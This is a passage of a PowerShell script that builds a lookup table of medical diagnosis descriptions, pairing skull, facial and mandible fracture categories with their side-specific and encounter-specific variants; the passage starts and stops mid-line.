skull, right side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, left side","Fracture of base of skull, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, left side","Fracture of base of skull, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, left side","Fracture of base of skull, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, left side","Fracture of base of skull, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, left side","Fracture of base of skull, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, left side","Fracture of base of skull, left side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, unspecified side","Fracture of base of skull, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, unspecified side","Fracture of base of skull, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, unspecified side","Fracture of base of skull, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, unspecified side","Fracture of base of skull, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, unspecified side","Fracture of base of skull, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of base of skull, unspecified side","Fracture of base of skull, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, unspecified side","Type I occipital condyle fracture, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, unspecified side","Type I occipital condyle fracture, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, unspecified side","Type I occipital condyle fracture, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, unspecified side","Type I occipital condyle fracture, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, unspecified side","Type I occipital condyle fracture, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, unspecified side","Type I occipital condyle fracture, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, unspecified side","Type II occipital condyle fracture, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, unspecified side","Type II occipital condyle fracture, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, unspecified side","Type II occipital condyle fracture, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, unspecified side","Type II occipital condyle fracture, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, unspecified side","Type II occipital condyle fracture, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, unspecified side","Type II occipital condyle fracture, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, unspecified side","Type III occipital condyle fracture, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, unspecified side","Type III occipital condyle fracture, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, unspecified side","Type III occipital condyle fracture, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, unspecified side","Type III occipital condyle fracture, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, unspecified side","Type III occipital condyle fracture, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, unspecified side","Type III occipital condyle fracture, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occipital condyle fracture","Unspecified occipital condyle fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified occipital condyle fracture","Unspecified occipital condyle fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified occipital condyle fracture","Unspecified occipital condyle fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified occipital condyle fracture","Unspecified occipital condyle fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified occipital condyle fracture","Unspecified occipital condyle fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified occipital condyle fracture","Unspecified occipital condyle fracture, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, unspecified side","Other fracture of occiput, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, unspecified side","Other fracture of occiput, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, unspecified side","Other fracture of occiput, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, unspecified side","Other fracture of occiput, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, unspecified side","Other fracture of occiput, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, unspecified side","Other fracture of occiput, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of occiput","Unspecified fracture of occiput, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of occiput","Unspecified fracture of occiput, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of occiput","Unspecified fracture of occiput, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of occiput","Unspecified fracture of occiput, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of occiput","Unspecified fracture of occiput, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of occiput","Unspecified fracture of occiput, sequela") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, right side","Type I occipital condyle fracture, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, right side","Type I occipital condyle fracture, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, right side","Type I occipital condyle fracture, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, right side","Type I occipital condyle fracture, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, right side","Type I occipital condyle fracture, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, right side","Type I occipital condyle fracture, right side, sequela") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, left side","Type I occipital condyle fracture, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, left side","Type I occipital condyle fracture, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, left side","Type I occipital condyle fracture, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, left side","Type I occipital condyle fracture, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, left side","Type I occipital condyle fracture, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type I occipital condyle fracture, left side","Type I occipital condyle fracture, left side, sequela") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, right side","Type II occipital condyle fracture, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, right side","Type II occipital condyle fracture, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, right side","Type II occipital condyle fracture, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, right side","Type II occipital condyle fracture, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, right side","Type II occipital condyle fracture, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, right side","Type II occipital condyle fracture, right side, sequela") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, left side","Type II occipital condyle fracture, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, left side","Type II occipital condyle fracture, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, left side","Type II occipital condyle fracture, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, left side","Type II occipital condyle fracture, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, left side","Type II occipital condyle fracture, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type II occipital condyle fracture, left side","Type II occipital condyle fracture, left side, sequela") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, right side","Type III occipital condyle fracture, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, right side","Type III occipital condyle fracture, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, right side","Type III occipital condyle fracture, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, right side","Type III occipital condyle fracture, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, right side","Type III occipital condyle fracture, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, right side","Type III occipital condyle fracture, right side, sequela") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, left side","Type III occipital condyle fracture, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, left side","Type III occipital condyle fracture, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, left side","Type III occipital condyle fracture, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, left side","Type III occipital condyle fracture, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, left side","Type III occipital condyle fracture, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III occipital condyle fracture, left side","Type III occipital condyle fracture, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, right side","Other fracture of occiput, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, right side","Other fracture of occiput, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, right side","Other fracture of occiput, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, right side","Other fracture of occiput, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, right side","Other fracture of occiput, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, right side","Other fracture of occiput, right side, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, left side","Other fracture of occiput, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, left side","Other fracture of occiput, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, left side","Other fracture of occiput, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, left side","Other fracture of occiput, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, left side","Other fracture of occiput, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of occiput, left side","Other fracture of occiput, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of base of skull","Other fracture of base of skull, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of base of skull","Other fracture of base of skull, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of base of skull","Other fracture of base of skull, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of base of skull","Other fracture of base of skull, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of base of skull","Other fracture of base of skull, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of base of skull","Other fracture of base of skull, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of nasal bones","Fracture of nasal bones, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of nasal bones","Fracture of nasal bones, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of nasal bones","Fracture of nasal bones, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of nasal bones","Fracture of nasal bones, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of nasal bones","Fracture of nasal bones, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of nasal bones","Fracture of nasal bones, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, unspecified side","Fracture of orbital floor, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, unspecified side","Fracture of orbital floor, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, unspecified side","Fracture of orbital floor, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, unspecified side","Fracture of orbital floor, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, unspecified side","Fracture of orbital floor, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, unspecified side","Fracture of orbital floor, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, right side","Fracture of orbital floor, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, right side","Fracture of orbital floor, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, right side","Fracture of orbital floor, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, right side","Fracture of orbital floor, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, right side","Fracture of orbital floor, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, right side","Fracture of orbital floor, right side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, left side","Fracture of orbital floor, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, left side","Fracture of orbital floor, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, left side","Fracture of orbital floor, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, left side","Fracture of orbital floor, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, left side","Fracture of orbital floor, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of orbital floor, left side","Fracture of orbital floor, left side, sequela") + $null = $DiagnosisList.Rows.Add("Malar fracture, unspecified side","Malar fracture, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Malar fracture, unspecified side","Malar fracture, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Malar fracture, unspecified side","Malar fracture, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Malar fracture, unspecified side","Malar fracture, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Malar fracture, unspecified side","Malar fracture, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Malar fracture, unspecified side","Malar fracture, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, unspecified side","Maxillary fracture, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, unspecified side","Maxillary fracture, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, unspecified side","Maxillary fracture, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, unspecified side","Maxillary fracture, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, unspecified side","Maxillary fracture, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, unspecified side","Maxillary fracture, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, unspecified side","Zygomatic fracture, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, unspecified side","Zygomatic fracture, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, unspecified side","Zygomatic fracture, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, unspecified side","Zygomatic fracture, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, unspecified side","Zygomatic fracture, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, unspecified side","Zygomatic fracture, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Malar fracture, right side","Malar fracture, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Malar fracture, right side","Malar fracture, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Malar fracture, right side","Malar fracture, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Malar fracture, right side","Malar fracture, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Malar fracture, right side","Malar fracture, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Malar fracture, right side","Malar fracture, right side, sequela") + $null = $DiagnosisList.Rows.Add("Malar fracture, left side","Malar fracture, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Malar fracture, left side","Malar fracture, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Malar fracture, left side","Malar fracture, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Malar fracture, left side","Malar fracture, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Malar fracture, left side","Malar fracture, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Malar fracture, left side","Malar fracture, left side, sequela") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, right side","Maxillary fracture, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, right side","Maxillary fracture, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, right side","Maxillary fracture, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, right side","Maxillary fracture, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, right side","Maxillary fracture, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, right side","Maxillary fracture, right side, sequela") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, left side","Maxillary fracture, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, left side","Maxillary fracture, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, left side","Maxillary fracture, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, left side","Maxillary fracture, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, left side","Maxillary fracture, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Maxillary fracture, left side","Maxillary fracture, left side, sequela") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, right side","Zygomatic fracture, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, right side","Zygomatic fracture, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, right side","Zygomatic fracture, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, right side","Zygomatic fracture, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, right side","Zygomatic fracture, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, right side","Zygomatic fracture, right side, sequela") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, left side","Zygomatic fracture, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, left side","Zygomatic fracture, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, left side","Zygomatic fracture, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, left side","Zygomatic fracture, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, left side","Zygomatic fracture, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Zygomatic fracture, left side","Zygomatic fracture, left side, sequela") + $null = $DiagnosisList.Rows.Add("LeFort I fracture","LeFort I fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("LeFort I fracture","LeFort I fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("LeFort I fracture","LeFort I fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("LeFort I fracture","LeFort I fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("LeFort I fracture","LeFort I fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("LeFort I fracture","LeFort I fracture, sequela") + $null = $DiagnosisList.Rows.Add("LeFort II fracture","LeFort II fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("LeFort II fracture","LeFort II fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("LeFort II fracture","LeFort II fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("LeFort II fracture","LeFort II fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("LeFort II fracture","LeFort II fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("LeFort II fracture","LeFort II fracture, sequela") + $null = $DiagnosisList.Rows.Add("LeFort III fracture","LeFort III fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("LeFort III fracture","LeFort III fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("LeFort III fracture","LeFort III fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("LeFort III fracture","LeFort III fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("LeFort III fracture","LeFort III fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("LeFort III fracture","LeFort III fracture, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of maxilla","Fracture of alveolus of maxilla, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of maxilla","Fracture of alveolus of maxilla, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of maxilla","Fracture of alveolus of maxilla, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of maxilla","Fracture of alveolus of maxilla, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of maxilla","Fracture of alveolus of maxilla, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of maxilla","Fracture of alveolus of maxilla, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of tooth (traumatic)","Fracture of tooth (traumatic), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of tooth (traumatic)","Fracture of tooth (traumatic), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of tooth (traumatic)","Fracture of tooth (traumatic), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of tooth (traumatic)","Fracture of tooth (traumatic), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of tooth (traumatic)","Fracture of tooth (traumatic), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of tooth (traumatic)","Fracture of tooth (traumatic), sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of mandible, unspecified side","Fracture of unspecified part of body of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of mandible, unspecified side","Fracture of unspecified part of body of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of mandible, unspecified side","Fracture of unspecified part of body of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of mandible, unspecified side","Fracture of unspecified part of body of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of mandible, unspecified side","Fracture of unspecified part of body of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of mandible, unspecified side","Fracture of unspecified part of body of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of right mandible","Fracture of unspecified part of body of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of right mandible","Fracture of unspecified part of body of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of right mandible","Fracture of unspecified part of body of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of right mandible","Fracture of unspecified part of body of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of right mandible","Fracture of unspecified part of body of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of right mandible","Fracture of unspecified part of body of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of left mandible","Fracture of unspecified part of body of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of left mandible","Fracture of unspecified part of body of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of left mandible","Fracture of unspecified part of body of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of left mandible","Fracture of unspecified part of body of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of left mandible","Fracture of unspecified part of body of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of body of left mandible","Fracture of unspecified part of body of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of mandible, unspecified","Fracture of mandible, unspecified, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of mandible, unspecified","Fracture of mandible, unspecified, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of mandible, unspecified","Fracture of mandible, unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of mandible, unspecified","Fracture of mandible, unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of mandible, unspecified","Fracture of mandible, unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of mandible, unspecified","Fracture of mandible, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of mandible, unspecified side","Fracture of condylar process of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of mandible, unspecified side","Fracture of condylar process of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of mandible, unspecified side","Fracture of condylar process of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of mandible, unspecified side","Fracture of condylar process of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of mandible, unspecified side","Fracture of condylar process of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of mandible, unspecified side","Fracture of condylar process of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of right mandible","Fracture 